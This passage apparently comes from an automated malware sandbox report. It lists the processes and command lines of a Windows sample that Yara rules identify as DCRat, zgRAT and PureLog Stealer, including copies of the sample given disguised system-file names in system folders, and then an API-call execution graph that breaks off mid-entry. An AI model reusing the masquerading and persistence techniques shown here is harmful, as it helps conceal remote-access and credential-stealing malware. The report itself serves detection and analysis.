                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"
                                                                                  Imagebase:0x7ff7bbe90000
                                                                                  File size:2'759'232 bytes
                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP"
                                                                                  Imagebase:0x7ff7f4b50000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat"
                                                                                  Imagebase:0x7ff774390000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:14
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:15
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:chcp 65001
                                                                                  Imagebase:0x7ff661e30000
                                                                                  File size:14'848 bytes
                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:16
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                  Imagebase:0x7ff6e59b0000
                                                                                  File size:108'032 bytes
                                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:17
                                                                                  Start time:00:43:11
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\LiveKernelReports\RuntimeBroker.exe"
                                                                                  Imagebase:0xf60000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:20
                                                                                  Start time:00:43:39
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                                                                  Imagebase:0x940000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:21
                                                                                  Start time:00:43:47
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Recovery\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Recovery\conhost.exe"
                                                                                  Imagebase:0xb20000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:22
                                                                                  Start time:00:43:55
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                                                                  Imagebase:0x130000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:23
                                                                                  Start time:00:44:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
                                                                                  Imagebase:0xc30000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:24
                                                                                  Start time:00:44:28
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                                                                  Imagebase:0x170000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:25
                                                                                  Start time:00:44:37
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Recovery\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Recovery\conhost.exe"
                                                                                  Imagebase:0x660000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:26
                                                                                  Start time:00:44:45
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                                                                  Imagebase:0x210000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:6.3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:20.9%
                                                                                    Total number of Nodes:1085
                                                                                    Total number of Limit Nodes:51
                                                                                    execution_graph 42435 6310d0 42440 635abd 42435->42440 42441 635ac7 __EH_prolog 42440->42441 42442 63b505 25 API calls 42441->42442 42443 635ad3 42442->42443 42447 635cac NtQueryInformationProcess GetSystemInfo 42443->42447 41494 64b7e0 41495 64b7ea __EH_prolog 41494->41495 41649 631316 41495->41649 41498 64bf0f 41709 64d69e 41498->41709 41499 64b82a 41502 64b838 41499->41502 41503 64b89b 41499->41503 41572 64b841 41499->41572 41507 64b83c 41502->41507 41508 64b878 41502->41508 41506 64b92e GetDlgItemTextW 41503->41506 41512 64b8b1 41503->41512 41504 64bf38 41510 64bf41 SendDlgItemMessageW 41504->41510 41511 64bf52 GetDlgItem SendMessageW 41504->41511 41505 64bf2a SendMessageW 41505->41504 41506->41508 41509 64b96b 41506->41509 41513 63e617 7 API calls 41507->41513 41507->41572 41515 64b95f EndDialog 41508->41515 41508->41572 41516 64b980 GetDlgItem 41509->41516 41645 64b974 41509->41645 41510->41511 41726 64a64d 41511->41726 41517 63e617 7 API calls 41512->41517 41518 64b85b 41513->41518 41515->41572 41520 64b994 SendMessageW SendMessageW 41516->41520 41521 64b9b7 SetFocus 41516->41521 41522 64b8ce SetDlgItemTextW 41517->41522 41747 63124f SHGetMalloc 41518->41747 41520->41521 41526 64b9c7 41521->41526 41537 64b9e0 41521->41537 41527 64b8d9 41522->41527 41524 64bfa5 SetWindowTextW 41728 64abab GetClassNameW 41524->41728 41525 64bf9f 41525->41524 41530 63e617 7 API calls 41526->41530 41533 64b8e6 GetMessageW 41527->41533 41527->41572 41528 64be55 41531 63e617 7 API calls 41528->41531 41534 64b9d1 41530->41534 41538 64be65 SetDlgItemTextW 41531->41538 41540 64b8fd IsDialogMessageW 41533->41540 41533->41572 41748 64d4d4 41534->41748 41536 64c1fc SetDlgItemTextW 41536->41572 41544 63e617 7 API calls 41537->41544 41542 64be79 41538->41542 41540->41527 41541 64b90c TranslateMessage DispatchMessageW 41540->41541 41541->41527 41545 63e617 7 API calls 41542->41545 41547 64ba17 41544->41547 41577 64be9c _wcslen 41545->41577 41546 64bff0 41550 64c020 41546->41550 41554 63e617 7 API calls 41546->41554 41551 634092 _swprintf 5 API calls 41547->41551 41549 64c73f 30 API calls 41549->41546 41559 64c73f 30 API calls 41550->41559 41597 64c0d8 41550->41597 41555 64ba29 41551->41555 41552 64b9d9 41659 63a0b1 41552->41659 41557 64c003 SetDlgItemTextW 41554->41557 41558 64d4d4 16 API calls 41555->41558 41556 64c18b 41560 64c194 EnableWindow 41556->41560 41561 64c19d 41556->41561 41564 63e617 7 API calls 41557->41564 41558->41552 41565 64c03b 41559->41565 41560->41561 41566 64c1ba 41561->41566 41766 6312d3 GetDlgItem EnableWindow 41561->41766 41562 64beed 41568 63e617 7 API calls 41562->41568 41567 64c017 SetDlgItemTextW 41564->41567 41573 64c04d 41565->41573 41595 64c072 41565->41595 41571 64c1e1 41566->41571 41583 64c1d9 SendMessageW 41566->41583 41567->41550 41568->41572 41569 64c0cb 41576 64c73f 30 API calls 41569->41576 41571->41572 41584 63e617 7 API calls 41571->41584 41764 649ed5 8 API calls 41573->41764 41575 64c1b0 41767 6312d3 GetDlgItem EnableWindow 41575->41767 41576->41597 41577->41562 41586 63e617 7 API calls 41577->41586 41578 64bb11 41580 64bb20 41578->41580 41585 64bd56 41578->41585 41579 64ba87 41579->41578 41579->41580 41666 634092 41579->41666 41589 64bcfb 41580->41589 41590 64bcf1 41580->41590 41758 63f28c 23 API calls 41580->41758 41581 64c066 41581->41595 41583->41571 41588 64b862 41584->41588 41680 6312f1 GetDlgItem ShowWindow 41585->41680 41591 64bed0 41586->41591 41588->41536 41588->41572 41594 63e617 7 API calls 41589->41594 41590->41508 41590->41589 41598 634092 _swprintf 5 API calls 41591->41598 41592 64c169 41765 649ed5 8 API calls 41592->41765 41601 64bd05 41594->41601 41595->41569 41602 64c73f 30 API calls 41595->41602 41596 64bd66 41681 6312f1 GetDlgItem ShowWindow 41596->41681 41597->41556 41597->41592 41604 63e617 7 API calls 41597->41604 41598->41562 41599 64c188 41599->41556 41606 634092 _swprintf 5 API calls 41601->41606 41607 64c0a0 41602->41607 41604->41597 41605 64bac7 41669 63966e 41605->41669 41610 64bd23 41606->41610 41607->41569 41611 64c0a9 DialogBoxParamW 41607->41611 41608 64bd70 41682 63e617 41608->41682 41619 63e617 7 API calls 41610->41619 41611->41508 41611->41569 41613 64bb5f 41615 634092 _swprintf 5 API calls 41613->41615 41629 64bb81 41615->41629 41618 64baed 41673 63959a 41618->41673 41621 64bd3d 41619->41621 41620 64bd8c SetDlgItemTextW GetDlgItem 41622 64bdc1 41620->41622 41623 64bda9 GetWindowLongW SetWindowLongW 41620->41623 41687 64c73f 41622->41687 41623->41622 41626 64bc6b ShellExecuteExW 41642 64bc88 41626->41642 41628 64c73f 30 API calls 41630 64bddd 41628->41630 41631 64bbf4 41629->41631 41648 64bc3f __InternalCxxFrameHandler 41629->41648 41697 64da52 41630->41697 41759 64b425 SHGetMalloc 41631->41759 41634 64bc10 41760 64b425 SHGetMalloc 41634->41760 41637 64c73f 30 API calls 41638 64be03 41637->41638 41640 64be2c 41638->41640 41647 64c73f 30 API calls 41638->41647 41639 64bc1c 41761 64b425 SHGetMalloc 41639->41761 41763 6312d3 GetDlgItem EnableWindow 41640->41763 41642->41590 41644 64bc28 41762 63f3fa 23 API calls 2 library calls 41644->41762 41645->41508 41645->41528 41647->41640 41648->41626 41650 631378 41649->41650 41652 63131f 41649->41652 41769 63e2c1 GetWindowLongW SetWindowLongW 41650->41769 41651 631385 41651->41498 41651->41499 41651->41572 41652->41651 41768 63e2e8 15 API calls 2 library calls 41652->41768 41655 631341 41655->41651 41656 631354 GetDlgItem 41655->41656 41656->41651 41657 631364 41656->41657 41657->41651 41658 63136a SetWindowTextW 41657->41658 41658->41651 41662 63a0bb 41659->41662 41660 63a14c 41661 63a2b2 4 API calls 41660->41661 41663 63a175 41660->41663 41661->41663 41662->41660 41662->41663 41770 63a2b2 41662->41770 41665 64ac04 SetCurrentDirectoryW 41663->41665 41665->41579 41793 634065 41666->41793 41670 639678 41669->41670 41671 6396d5 CreateFileW 41670->41671 41672 6396c9 41670->41672 41671->41672 41672->41618 41674 6395cf 41673->41674 41675 6395be 41673->41675 41674->41578 41675->41674 41676 6395d1 41675->41676 41677 6395ca 41675->41677 41879 639620 41676->41879 41874 63974e 41677->41874 41680->41596 41681->41608 41683 63e627 41682->41683 41890 63e648 41683->41890 41686 6312f1 GetDlgItem ShowWindow 41686->41620 41694 64c749 _abort _wcslen __EH_prolog _wcsrchr 41687->41694 41688 64bdcf 41688->41628 41689 64ca67 SetWindowTextW 41689->41694 41692 64cc31 GetDlgItem SetWindowTextW SendMessageW 41692->41694 41694->41688 41694->41689 41694->41692 41695 64cc71 SendMessageW 41694->41695 41696 634092 _swprintf 5 API calls 41694->41696 41910 63b991 5 API calls 3 library calls 41694->41910 41911 63a5d1 FindFirstFileW FindFirstFileW 41694->41911 41912 64b48e 23 API calls 2 library calls 41694->41912 41695->41694 41696->41694 41698 64da5c __EH_prolog 41697->41698 41913 640659 41698->41913 41700 64da8d 41917 635b3d 41700->41917 41702 64daab 41921 637b0d 41702->41921 41706 64dafe 41937 637b9e 41706->41937 41708 64bdee 41708->41637 41710 64d6a8 41709->41710 42404 64a5c6 41710->42404 41713 64d6b5 GetWindow 41714 64bf15 41713->41714 41716 64d6d5 41713->41716 41714->41504 41714->41505 41715 64d6e2 GetClassNameW 41715->41716 41716->41714 41716->41715 41717 64d706 GetWindowLongW 41716->41717 41718 64d76a GetWindow 41716->41718 41717->41718 41719 64d716 SendMessageW 41717->41719 41718->41714 41718->41716 41719->41718 41720 64d72c GetObjectW 41719->41720 42409 64a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41720->42409 41722 64d743 42410 64a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41722->42410 42411 64a80c 8 API calls 41722->42411 41725 64d754 SendMessageW DeleteObject 41725->41718 41727 64a65b GetDlgItem 41726->41727 41727->41524 41727->41525 41729 64abf1 41728->41729 41730 64abcc 41728->41730 41731 64abf6 SHAutoComplete 41729->41731 41732 64abff 41729->41732 41730->41729 41733 64abe3 FindWindowExW 41730->41733 41731->41732 41734 64b093 41732->41734 41733->41729 41735 64b09d __EH_prolog 41734->41735 41736 6313dc 25 API calls 41735->41736 41737 64b0bf 41736->41737 42414 631fdc 41737->42414 41740 64b0d9 41742 631692 25 API calls 41740->41742 41741 64b0eb 41743 6319af 27 API calls 41741->41743 41744 64b0e4 41742->41744 41746 64b10d __InternalCxxFrameHandler ___std_exception_copy 41743->41746 41744->41546 41744->41549 41745 631692 25 API calls 41745->41744 41746->41745 41747->41588 42422 64b568 PeekMessageW 41748->42422 41751 64d536 SendMessageW SendMessageW 41753 64d591 SendMessageW SendMessageW SendMessageW 41751->41753 41754 64d572 41751->41754 41752 64d502 41755 64d50d ShowWindow SendMessageW SendMessageW 41752->41755 41756 64d5c4 SendMessageW 41753->41756 41757 64d5e7 SendMessageW 41753->41757 41754->41753 41755->41751 41756->41757 41757->41552 41758->41613 41759->41634 41760->41639 41761->41644 41762->41648 41763->41645 41764->41581 41765->41599 41766->41575 41767->41566 41768->41655 41769->41651 41771 63a2bf 41770->41771 41772 63a2e3 41771->41772 41773 63a2d6 CreateDirectoryW 41771->41773 41782 63a231 41772->41782 41773->41772 41775 63a2e9 41773->41775 41776 63a325 41775->41776 41778 63a4ed 41775->41778 41776->41662 41785 64ec50 41778->41785 41781 63a510 41781->41776 41787 63a243 41782->41787 41786 63a4fa SetFileAttributesW 41785->41786 41786->41781 41788 64ec50 41787->41788 41789 63a250 GetFileAttributesW 41788->41789 41790 63a261 41789->41790 41791 63a23a 41789->41791 41790->41791 41792 63a279 GetFileAttributesW 41790->41792 41791->41775 41792->41791 41794 63407c __vswprintf_c_l 41793->41794 41797 655fd4 41794->41797 41800 654097 41797->41800 41801 6540bf 41800->41801 41804 6540d7 41800->41804 41822 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41801->41822 41803 6540df 41824 654636 41803->41824 41804->41801 41804->41803 41805 6540c4 41823 659087 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 41805->41823 41811 634086 41811->41605 41812 654167 41833 6549e6 5 API calls 4 library calls 41812->41833 41815 6540cf 41817 64fbbc 41815->41817 41816 654172 41834 6546b9 UnhandledExceptionFilter RtlFreeHeap _free 41816->41834 41818 64fbc4 41817->41818 41819 64fbc5 41817->41819 41818->41811 41835 64fbca UnhandledExceptionFilter 41819->41835 41821 64fcea 41821->41811 41822->41805 41823->41815 41825 654653 41824->41825 41826 6540ef 41824->41826 41825->41826 41836 6597e5 41825->41836 41832 654601 UnhandledExceptionFilter RtlFreeHeap __dosmaperr __vswprintf_c_l 41826->41832 41830 65468d 41855 659967 5 API calls __cftof 41830->41855 41832->41812 41833->41816 41834->41815 41835->41821 41837 6597ef 41836->41837 41838 659801 41837->41838 41856 65ae5b UnhandledExceptionFilter CatchGuardHandler __dosmaperr 41837->41856 41843 654674 41838->41843 41857 65b136 41838->41857 41842 65981b 41863 658dcc 41842->41863 41854 65993a 5 API calls __cftof 41843->41854 41846 659830 41846->41842 41847 659837 41846->41847 41869 659649 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41847->41869 41848 659821 41848->41843 41870 658d24 5 API calls _abort 41848->41870 41850 659842 41851 658dcc _free 2 API calls 41850->41851 41851->41848 41854->41830 41855->41826 41856->41838 41862 65b143 __dosmaperr 41857->41862 41858 65b183 41872 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41858->41872 41860 659813 41860->41842 41868 65aeb1 UnhandledExceptionFilter CatchGuardHandler __dosmaperr 41860->41868 41862->41858 41862->41860 41871 657a5e UnhandledExceptionFilter CatchGuardHandler __dosmaperr 41862->41871 41864 658dd7 RtlFreeHeap 41863->41864 41867 658df2 __dosmaperr 41863->41867 41865 658dec 41864->41865 41864->41867 41873 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41865->41873 41867->41848 41868->41846 41869->41850 41871->41862 41872->41860 41873->41867 41875 639781 41874->41875 41876 639757 41874->41876 41875->41674 41876->41875 41885 63a1e0 41876->41885 41878 63977f 41878->41674 41880 63964a 41879->41880 41881 63962c 41879->41881 41882 639669 41880->41882 41889 636bd5 23 API calls 41880->41889 41881->41880 41883 639638 CloseHandle 41881->41883 41882->41674 41883->41880 41886 64ec50 41885->41886 41887 63a1ed DeleteFileW 41886->41887 41888 63a200 41887->41888 41888->41878 41889->41882 41896 63d9b0 41890->41896 41893 63e645 SetDlgItemTextW 41893->41686 41894 63e66b LoadStringW 41894->41893 41895 63e682 LoadStringW 41894->41895 41895->41893 41901 63d8ec 41896->41901 41898 63d9cd 41899 63d9e2 41898->41899 41907 63d9f0 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 41898->41907 41899->41893 41899->41894 41902 63d904 41901->41902 41906 63d984 _strncpy 41901->41906 41905 63d959 41902->41905 41908 63e5b1 5 API calls __vsnprintf 41902->41908 41909 656159 3 API calls 3 library calls 41905->41909 41906->41898 41907->41899 41908->41905 41909->41906 41910->41694 41911->41694 41912->41694 41914 640666 _wcslen 41913->41914 41941 6317e9 41914->41941 41916 64067e 41916->41700 41918 640659 _wcslen 41917->41918 41919 6317e9 23 API calls 41918->41919 41920 64067e 41919->41920 41920->41702 41922 637b17 __EH_prolog 41921->41922 41956 63ce40 41922->41956 41924 637b32 41962 64eb38 41924->41962 41927 637b5c 41966 644a76 41927->41966 41929 637c7d 41930 637c87 41929->41930 41932 637cf1 41930->41932 41995 63a56d 41930->41995 41934 637d50 41932->41934 41974 638284 41932->41974 41933 637d92 41933->41706 41934->41933 42001 63138b 23 API calls 41934->42001 41938 637bac 41937->41938 41940 637bb3 41937->41940 41939 642297 23 API calls 41938->41939 41939->41940 41942 6317ff 41941->41942 41951 63185a __InternalCxxFrameHandler 41941->41951 41943 631828 41942->41943 41952 636c36 23 API calls __vswprintf_c_l 41942->41952 41947 631887 41943->41947 41948 631847 ___std_exception_copy 41943->41948 41945 63181e 41953 636ca7 23 API calls 41945->41953 41947->41951 41955 636ca7 23 API calls 41947->41955 41948->41951 41954 636ca7 23 API calls 41948->41954 41951->41916 41952->41945 41953->41943 41954->41951 41955->41951 41957 63ce4a __EH_prolog 41956->41957 41958 64eb38 UnhandledExceptionFilter 41957->41958 41959 63ce8d 41958->41959 41960 64eb38 UnhandledExceptionFilter 41959->41960 41961 63ceb1 41960->41961 41961->41924 41963 64eb3d ___std_exception_copy 41962->41963 41965 64eb57 _com_raise_error 41963->41965 41972 657a5e UnhandledExceptionFilter CatchGuardHandler __dosmaperr 41963->41972 41965->41927 41967 644a80 __EH_prolog 41966->41967 41968 64eb38 UnhandledExceptionFilter 41967->41968 41969 644a9c 41968->41969 41970 637b8b 41969->41970 41973 640e46 23 API calls 41969->41973 41970->41929 41972->41963 41973->41970 41975 63828e __EH_prolog 41974->41975 42002 6313dc 41975->42002 41977 6382aa 41978 6382bb 41977->41978 42148 639f42 41977->42148 41981 6382f2 41978->41981 42010 631a04 41978->42010 42139 631692 41981->42139 41984 638389 42029 638430 41984->42029 41986 6383e8 42035 631f6d 41986->42035 41987 6383a3 41987->41986 42032 641b66 41987->42032 41990 6382ee 41990->41981 41990->41984 41993 63a56d 3 API calls 41990->41993 41991 6383f3 41991->41981 42039 633b2d 41991->42039 42051 63848e 41991->42051 41993->41990 41996 63a582 41995->41996 42000 63a5b0 41996->42000 42398 63a69b 41996->42398 41998 63a592 41999 63a597 FindClose 41998->41999 41998->42000 41999->42000 42000->41930 42001->41933 42003 6313e6 __EH_prolog 42002->42003 42004 63ce40 UnhandledExceptionFilter 42003->42004 42005 631419 42004->42005 42006 64eb38 UnhandledExceptionFilter 42005->42006 42008 631474 _abort 42005->42008 42007 631461 42006->42007 42007->42008 42152 63b505 42007->42152 42008->41977 42011 631a0e __EH_prolog 42010->42011 42023 631a61 42011->42023 42026 631b9b 42011->42026 42171 6313ba 42011->42171 42013 631bc7 42182 63138b 23 API calls 42013->42182 42016 633b2d 25 API calls 42020 631c12 42016->42020 42017 631bd4 42017->42016 42017->42026 42018 631c5a 42021 631c8d 42018->42021 42018->42026 42183 63138b 23 API calls 42018->42183 42020->42018 42022 633b2d 25 API calls 42020->42022 42021->42026 42027 639e80 24 API calls 42021->42027 42022->42020 42023->42013 42023->42017 42023->42026 42024 633b2d 25 API calls 42025 631cde 42024->42025 42025->42024 42025->42026 42026->41990 42027->42025 42201 63cf3d 42029->42201 42031 638440 42031->41987 42209 64de6b 42032->42209 42036 631f77 __EH_prolog 42035->42036 42038 631fa6 42036->42038 42217 6319af 42036->42217 42038->41991 42040 633b39 42039->42040 42041 633b3d 42039->42041 42040->41991 42050 639e80 24 API calls 42041->42050 42042 633b4f 42043 633b6a 42042->42043 42044 633b78 42042->42044 42045 633baa 42043->42045 42326 6332f7 25 API calls 2 library calls 42043->42326 42327 63286b 25 API calls 3 library calls 42044->42327 42045->41991 42048 633b76 42048->42045 42328 6320d7 23 API calls 42048->42328 42050->42042 42052 638498 __EH_prolog 42051->42052 42057 6384d5 42052->42057 42070 638513 42052->42070 42351 648c8d 25 API calls 42052->42351 42054 6384f5 42055 6384fa 42054->42055 42056 63851c 42054->42056 42055->42070 42352 637a0d 35 API calls 42055->42352 42056->42070 42353 648c8d 25 API calls 42056->42353 42057->42054 42061 63857a 42057->42061 42057->42070 42061->42070 42329 635d1a 42061->42329 42062 638605 42062->42070 42335 638167 42062->42335 42065 638797 42066 63a56d 3 API calls 42065->42066 42067 638802 42065->42067 42066->42067 42341 